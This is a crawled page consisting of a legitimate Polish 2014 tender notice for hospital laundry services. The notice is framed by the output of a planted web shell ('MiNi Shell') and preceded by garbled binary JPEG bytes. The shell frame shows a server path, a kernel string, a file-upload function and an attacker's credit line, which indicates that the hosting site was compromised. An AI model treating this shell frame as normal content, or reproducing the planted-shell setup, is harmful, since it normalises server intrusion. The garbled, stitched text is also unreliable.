JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140422/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140422/86755-N-2014.html

<p class="kh_header"><b>Krynica - Zdrój: Przetarg nieograniczony na usługi pralnicze dla SPZOZ - Szpitala im. dr J. Dietla w Krynicy - Zdroju</b><br>
<b>Numer ogłoszenia: 86755 - 2014; data zamieszczenia: 22.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej - Szpital im. dr J. Dietla w Krynicy Zdroju , ul. Kraszewskiego 142, 33-380 Krynica - Zdrój, woj. małopolskie, tel. 018 4712807, 4715196, faks 018 4712338.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-krynica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na usługi pralnicze dla SPZOZ - Szpitala im. dr J. Dietla w Krynicy - Zdroju.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> II.1	PRZEDMIOTEM ZAMÓWIENIA JEST wykonanie usług pralniczych dla SPZOZ - Szpitala im. dr J. Dietla w Krynicy - Zdroju. Zamawiający określa szacunkową wielkość przedmiotu zamówienia na ok. 170 000,00 kg na 24 miesiące zgodnie z przepisami obowiązującymi w tym zakresie w terminie 24 miesięcy od daty podpisania umowy. 
II.2.	Usługą będzie objęty asortyment:
a.	bielizna szpitalna biała i kolorowa tj. poszwy, poszewki, prześcieradła, podkłady, kompresy,
b.	odzież szpitalna tj. pidżamy, szlafroki, czepki, chustki, bluzy, fartuchy i ubrania,
c.	ubrania operacyjne damskie i męskie w kolorze: czerwony, zielony, niebieski,
d.	prześcieradła i podkłady operacyjne,
e.	bielizna porodowa - koszule zabiegowe, kompresy, 
f.	bielizna noworodkowa tj. kaftaniki, pieluchy, kocyki, poszewki,
g.	bielizna niemowlęca i dziecięca tj. kaftaniki, śpioszki, pieluchy, pidżamy, 
h.	odzież ochronna - garsonki, fartuchy lekarskie, peleryny, 
i.	zmiany pościelowe lekarskie i pidżamy,
j.	poduszki, kołdry, koce,
k.	ręczniki, obrusy, serwety,
l.	materace gąbczaste i przeciwodleżynowe oraz z pianki poliuretanowej
m.	ścierki, mopy - wkłady bawełniane, chodniczki, maty antypoślizgowe,
n.	firany, zasłony, żaluzje pionowe,
o.	pokrowce na ubrania, zabawki pluszowe,
II.3.	Usługa winna być świadczona zgodnie z obowiązującymi wymogami sanitarno epidemiologicznymi dla procesów dezynfekcji i prania w zależności od asortymentu bielizny oraz technologią i warunkami obowiązującymi w placówkach służby zdrowia. 
II.4.	Usługa pralnicza obejmuje w szczególności:
a)	dezynfekcję całej bielizny szpitalnej i pozostałego asortymentu będącego przedmiotem umowy wskutek działania temperatury lub skojarzonego działania temperatury i chemicznych środków dezynfekcyjnych, pranie wodne, a także czyszczenie chemiczne  ( np. materacy nieodpornych na pranie w maszynach bębnowych), płukanie przy użyciu płynu antystatycznego (w przypadku kocy), krochmalenie wybranych asortymentów, suszenie, maglowanie, prasownie w tym również ręczne w przypadku ubrań lekarskich, składnie na prawą stronę,
b)	drobne naprawy bielizny i odzieży medycznej w tym: cerowanie, łatanie, przyszywanie guzików, wszywanie zamków, doszywanie troczków itd.
c)	wydzielenie przez Wykonawcę bielizny szpitalnej, odzieży ochronnej lub innego asortymentu do naprawy lub do kasacji i zwrot do zamawiającego. W przypadku niewydzielania bielizny szpitalnej, odzieży ochronnej lub innego asortymentu nadającego się do reparacji, kasacji lub dostarczenia bielizny wilgotnej Zamawiający będzie odliczał w/w asortyment od wagi podlegającej rozliczeniu.
d)	odbiór bielizny brudnej przez Wykonawcę, załadunek i transport,  przywóz i rozładunek czystej bielizny do magazynu czystej bielizny Zamawiającego na koszt Wykonawcy.
e)	transport Wykonawcy zgodny z obowiązującymi wymaganiami sanitarnymi i epidemiologicznymi łącznie z transportem wewnętrznym (z i do punktów bielizny - zamykane wózki).

II.5.	Do obowiązków Wykonawcy należy:
1.	zapewnienie w cenie usługi wszelkich środków i innych artykułów niezbędnych do prawidłowego wykonania usługi,
2.	dostarczenie bielizny ochronnej i roboczej na wieszakach i zabezpieczonej pokrowcami ochronnymi z folii.
3.	stosowanie profesjonalnych środków piorących i dezynfekcyjnych, gwarantujących właściwą jakość prania i nie powodujących przyspieszonego zużycia bielizny zapewniających odpowiedni poziom bieli, trwałości koloru, wytrzymałości bielizny na rozciąganie, odpowiednich walorów użytkowych.
4.	Wykonawca ponosi odpowiedzialność za utratę lub uszkodzenie rzeczy będących przedmiotem usługi i zobowiązuje się do odkupienia zniszczonej lub zagubionej bielizny, odzieży szpitalnej lub innego asortymentu będącego przedmiotem umowy w ciągu 5 dni, licząc od dnia zgłoszenia reklamacji. 
5.	Wykonawca ponosi pełną odpowiedzialność za właściwą i terminową realizację usługi pralniczej i transportu bielizny wobec Zamawiającego oraz organów kontroli.
6.	Wykonawca zobowiązany jest do prowadzenia kontroli czystości wypranej i poddanej procesowi dezynfekcji czystej bielizny szpitalnej i pozostałego asortymentu oraz środków transportu. Co najmniej raz na kwartał Wykonawca dostarczy Zamawiającemu wyniki badań mikrobiologicznych asortymentu należącego do Zamawiającego. Próby do powyższych badań w przypadku bielizny należy pobierać z 4 różnych asortymentów z uwzględnieniem miejsc trudno dostępnych (np. szwów). Zamawiający zastrzega sobie prawo do wykonywania kontroli i badań czystości bielizny w dowolnym czasie. Pełnymi kosztami badań w przypadku dodatnich wyników, oraz działań naprawczych każdorazowo będzie obciążony Wykonawca.
7.	Wykonawca zobowiązany jest do segregowania bielizny czystej i pozostałego asortymentu, pakowanie w podwójną warstwę folii i jednorazowy worek zewnętrzny (3 warstwy ochronne), oznakowane kodami poszczególnych oddziałów szpitala. Segregacja ma polegać na tym, że każdy rodzaj pranej bielizny szpitalnej ma być pakowany wg. asortymentu max. po 10 szt. Opakowania zabezpieczające przed wtórnym zakażeniem i zabrudzeniem, umożliwiający odbiór rodzajowo - ilościowy bez konieczności otwierania opakowania i łatwą  identyfikację wzrokową asortymentu.
8.	Wykonawca winien zapewnić dokumentację zdawczo - odbiorczą brudnej i czystej bielizny.
9.	Wykonawca na bieżąco zobowiązany jest dbać o właściwy poziom sanitarno - higieniczny pomieszczeń pralni, otoczenia oraz środków transportu, stosując odpowiednie procedury i procesy czystościowo-dezynfekcyjne.
10.	Zamawiający wymaga, aby Wykonawca dysponował pralnią z pełną barierą higieniczną.
11.	Zamawiający wymaga, aby Wykonawca zabezpieczył  Wykonanie usługi w razie awarii urządzeń pralniczych.
12.	Zamawiający wymaga by środki transportu posiadały aktualną opinię Państwowej Inspekcji Sanitarnej potwierdzającą, że są przystosowane do przewozu bielizny szpitalnej
II.6.	Sposób przyjmowania bielizny brudnej i dostawa bielizny czystej:
1.	Odbiór brudnej bielizny i przywóz czystej bielizny odbywać się będzie  6 razy w tygodniu (od poniedziałku do soboty) a w przypadku kumulacji dni wolnych lub świątecznych np. 2 kolejne dni, usługa świadczona będzie w co drugim dniu wolnym od pracy.
2.	Wykonawca odbierze bieliznę brudną z magazynu bielizny brudnej Zamawiającego od godz.  8:00 do 10:00 w każdy dzień świadczonej usługi.
3.	Wykonawca dostarczy czystą bieliznę od poniedziałku do soboty (włącznie) w godzinach od 7:00 do 9:00 do magazynu bielizny czystej.
4.	Organizacja oraz środki transportu, załadunku i rozładunku bielizny szpitalnej czystej i brudnej będą gwarantowały nie krzyżowanie się dróg czystych i brudnych oraz będą wykluczały kontakt bielizny szpitalnej czystej z brudną.
5.	Miejscem wykonania zamówienia jest siedziba Zamawiającego. Wykonawca wyznaczy osobę uprawnioną do odbioru brudnej bielizny i pokwitowania jej ilości.
6.	przekazywanie bielizny do pralni będzie się odbywać na podstawie dokumentacji zdawczo - odbiorczej.
7.	Ważenie czystej bielizny odbywać się będzie w magazynie czystej bielizny w obecności pracownika jednostki organizacyjnej Zamawiającego odpowiedzialnego za tę czynność. Czysta bielizna będzie dostarczana do magazynu posegregowana na poszczególne oddziały szpitalne .
8.	Warunki składowania i transportu czystej bielizny szpitalnej nie mogą powodować uszkodzeń, ubytków, winny zabezpieczyć powierzoną bieliznę przed dostępem osób trzecich i ujemnym wpływem otoczenia.
9.	Usługa ma być wykonana w terminach:
a) pranie bielizny pościelowej i operacyjnej do 24 godzin od jej odbioru,
b) pranie z reparacją do 48 godzin,
c) pranie odzieży personelu do 48 godzin,
d) pranie pozostałej bielizny szpitalnej do 24 godzin
10.	reklamacje jakościowe jak i ilościowe będą zgłaszane w ciągu 2 dni roboczych od odbioru przedmiotu zamówienia. 
11.	Wykonawca ma obowiązek natychmiastowej odpowiedzi na w/w reklamację w formie pisemnej i usunięcie jej w terminie 48 godzin od daty zgłoszenia.
12.	W razie powtarzających się reklamacji Zamawiający może rozwiązać umowę w trybie natychmiastowym ( 3 krotna reklamacja)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 98.31.00.00-9, 98.31.10.00-6, 98.31.50.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie tego warunku zamawiający nie precyzuje szczegółowego opisu sposobu dokonywania oceny spełnienia tego warunku. Wykonawca przedłoży jedynie oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy. Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga wykazania się przez Wykonawcę w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, realizacją co najmniej 1 usługi odpowiadającej swoim charakterem przedmiotowi zamówienia (usługi pralnicze w zakładzie opieki zdrowotnej) 
Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawiony przez Wykonawcę  wykaz (zał. nr 4 do SIWZ). Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie tego warunku zamawiający nie precyzuje szczegółowego opisu sposobu dokonywania oceny spełnienia tego warunku. Wykonawca przedłoży jedynie oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy. Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie tego warunku zamawiający nie precyzuje szczegółowego opisu sposobu dokonywania oceny spełnienia tego warunku. Wykonawca przedłoży jedynie oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy. Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie tego warunku zamawiający nie precyzuje szczegółowego opisu sposobu dokonywania oceny spełnienia tego warunku. Wykonawca przedłoży jedynie oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy. Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W zakresie potwierdzenia, że oferowane usługi, odpowiadają określonym wymaganiom  Zamawiający będzie wymagał po wyborze najkorzystniejszej oferty od Wykonawcy którego oferta zostanie wybrana przedłożenia:
a) aktualnej opinii zaświadczenia Państwowej Inspekcji Sanitarnej potwierdzających, że Wykonawca dysponuje pralnią z pełną barierą higieniczną.
b) aktualnej opinii zaświadczenia Państwowej Inspekcji Sanitarnej potwierdzającej, że środki transportu Wykonawcy są przystosowane do przewozu bielizny szpitalnej.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wypełniony formularz ofertowy stanowiący załącznik nr 1 do SIWZ, upoważnienie do podpisania oferty o ile to nie wynika z innych dokumentów</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza możliwość dokonania zmiany umowy jeżeli zachodzą następujące okoliczności:.
a) w przypadku zmiany przepisów dot. stawki podatku VAT lub innych przepisów ogólnie obowiązujących, które mają wpływ na realizacje umowy.
b) przedłużenia terminu obowiązywania umowy jeśli nie zostanie zrealizowany w całości przedmiot umowy przy nie zmienionych cenach.
2.Warunki zmian określonych w pkt.1 są następujące:
a) zmiany muszą być korzystne dla Zamawiającego.
b) zmiany nie mogą skutkować podwyższeniem cen jednostkowych, a tym samym wartości umowy, za wyjątkiem zmian o których mowa w ust.1 pkt a umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-krynica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej - Szpital im. dr J. Dietla w Krynicy - Zdroju z siedzibą: 33-380 Krynica, ul. Kraszewskiego 142, budynek administracji, pokój 108.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.04.2014 godzina 09:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej - Szpital im. dr J. Dietla w Krynicy - Zdroju z siedzibą: 33-380 Krynica, ul. Kraszewskiego 142, budynek administracji, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com